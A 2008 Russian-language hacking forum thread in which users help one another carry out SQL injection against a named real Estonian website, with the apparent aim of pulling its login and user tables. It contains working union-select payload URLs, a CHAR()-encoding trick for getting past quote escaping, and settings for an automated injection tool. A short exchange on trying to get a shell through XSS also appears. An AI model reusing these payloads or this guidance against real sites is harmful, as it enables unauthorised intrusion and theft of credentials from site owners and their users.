 |
|
28.08.2008, 18:55
|
|
Познавший АНТИЧАТ
Регистрация: 01.06.2008
Сообщений: 1,047
С нами:
9443906
Репутация:
3313
|
|
Сообщение от Mixon
Здраствуйте,у меня вот возникла такая проблема,я вот нашел уязвимость на сайте,я могу через ссылку в страницу запихнуть любой код, и html и javascript,все что вожу,все отображается на странице,вот только одно то что php никаким образом там не идет,я какой скрипт в страницу не запыхиваю,то сервер его не обрабатывает,а в исходном коде страницы виден всесь скрипт,и есче там фильтр перед ' и " ставит \ как можно залить шелл на етот сайт,есле пхп код когда оказывается в странице не работает....кста,а просто пхп там работает,там весь сайт построин из пхп страниц,и есче,там сервер у них стоит LiteSpeed Web Server может кто подскажит что делать дальше???
ыыыы давно так не смеялся =)
через xss ты не сможешь исполнить php код =), только яваскрипт на стороне клиента. Скорей бы школа..
|
|
|
28.08.2008, 19:59
|
|
Участник форума
Регистрация: 23.05.2008
Сообщений: 121
С нами:
9457097
Репутация:
133
|
|
http://forum.antichat.ru/showpost.php?p=836658&postcount=3099
отвечю сам на cвой вопрос нужно юзать select TOP X * from table
выводит X стоку из table )
всем спасибо  |
|
|
|
29.08.2008, 01:06
|
|
Участник форума
Регистрация: 12.03.2008
Сообщений: 254
С нами:
9560218
Репутация:
238
|
|
Сообщение от ChaaK
ыыыы давно так не смеялся =)
через xss ты не сможешь исполнить php код =), только яваскрипт на стороне клиента. Скорей бы школа..
Гг,ето мне уже обьяснили)) Ну хоть веселее стало те))И за школу не боись,день рождение дьявола будет уже скоро, до 1 числа есче 3 дня....  есле бы 3 месяца...
|
|
|
|
29.08.2008, 01:33
|
|
Новичок
Регистрация: 04.09.2007
Сообщений: 13
С нами:
9834147
Репутация:
4
|
|
Всем снова здоавствуйте, такая проблема:
при запросе
_http://www.lacucaracha.ee/index.php?mod=komm&return_params=mod%3Dnews&f_id=2 &t_text=LAULUV%D5ISTLUSE%20FINAAL&h_id=-1+union+select+ TABLE_NAME,2,3,4+FROM+INFORMATION_SCHEMA.TABLES+LI MIT+23,1/**/
получаем:
Unknown column 'cucca_logins' in 'where clause'
если попробовать проработать таблицу 'cucca_logins':
_http://www.lacucaracha.ee/index.php?mod=komm&return_params=mod%3Dnews&f_id=2 &t_text=LAULUV%D5ISTLUSE%20FINAAL&h_id=-1+union+select+ COLUMN_NAME,2,3,4+FROM+INFORMATION_SCHEMA.COLUMNS+ where+TABLE_NAME=cucca_logins+limit+23,1/**/
И опять получаем:
Unknown column 'cucca_logins' in 'where clause'
с cucca_users таже истории
Помогите пожалуйста, что я делаю не так?
Последний раз редактировалось zjuk@; 29.08.2008 в 01:41..
|
|
|
|
29.08.2008, 01:37
|
|
Members of Antichat - Level 5
Регистрация: 28.05.2007
Сообщений: 729
С нами:
9976706
Репутация:
1934
|
|
во-первых, /**/ ты открыл комментарий и тут же его закрыл. измени /**/ на /* или --
во-вторых, возми в ковычки во втором запросе cucca_logins
в-третьих, пропиши limit 1,10 для начала
|
|
|
|
29.08.2008, 01:49
|
|
Новичок
Регистрация: 04.09.2007
Сообщений: 13
С нами:
9834147
Репутация:
4
|
|
Сообщение от AFoST
во-первых, /**/ ты открыл комментарий и тут же его закрыл. измени /**/ на /* или --
во-вторых, возми в ковычки во втором запросе cucca_logins
в-третьих, пропиши limit 1,10 для начала
с кавычками меня послали, LIMIT в данном случае значения не имеет, а замена /**/ на -- ни к чему не привела.
|
|
|
|
29.08.2008, 02:05
|
|
Участник форума
Регистрация: 29.11.2005
Сообщений: 122
С нами:
10761096
Репутация:
27
|
|
Скачай SIPT (http://forum.antichat.ru/thread24918-SIPT.html)
Настройки поставь
Код:
URL=http://www.lacucaracha.ee/index.php?mod=komm&return_params=mod%3Dnews&f_id=2&t_text=LAULUV%D5ISTLUSE%20FINAAL&h_id=-1{SQLINJ}
Key=Unknown column
Search key by=Found
Close SQL=(ничего)
и все. /* тут вообще не надо и без него работает.
у меня работает и все находит.
Последний раз редактировалось Grema; 29.08.2008 в 02:21..
|
|
|
|
29.08.2008, 02:08
|
|
Участник форума
Регистрация: 12.01.2007
Сообщений: 262
С нами:
10172486
Репутация:
874
|
|
Все работает. Под чаром cucca_logins , так как кавчки экранирует
http://www.lacucaracha.ee/index.php?mod=menyy&kat=-4+union+select+1,2,column_name,4,5,6,7,8,9+from+in formation_schema.columns+where+table_name=CHAR(99, 117,99,99,97,95,108,111,103,105,110,115)--
|
|
|
|
29.08.2008, 02:17
|
|
Новичок
Регистрация: 04.09.2007
Сообщений: 13
С нами:
9834147
Репутация:
4
|
|
Сообщение от Red_Red1
Все работает. Под чаром cucca_logins , так как кавчки экранирует
спасибо большое, оказывается в запросе очипятывался =)
Скачай SIPT (http://forum.antichat.ru/thread24918-SIPT.html)
Настройки поставь
Спасибо есть, тока при поиске столбцов вылетает =( а при поиске таблиц нормально.
Пасибки всем
|
|
|
|
29.08.2008, 02:22
|
|
Участник форума
Регистрация: 29.11.2005
Сообщений: 122
С нами:
10761096
Репутация:
27
|
|
Сообщение от zjuk@
Спасибо есть, тока при поиске столбцов вылетает =( а при поиске таблиц нормально.
попробуй с моими настройками может прокатит, то у меня столбцы показывает. Если не получиться, говори в какой таблице столбцы надо
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
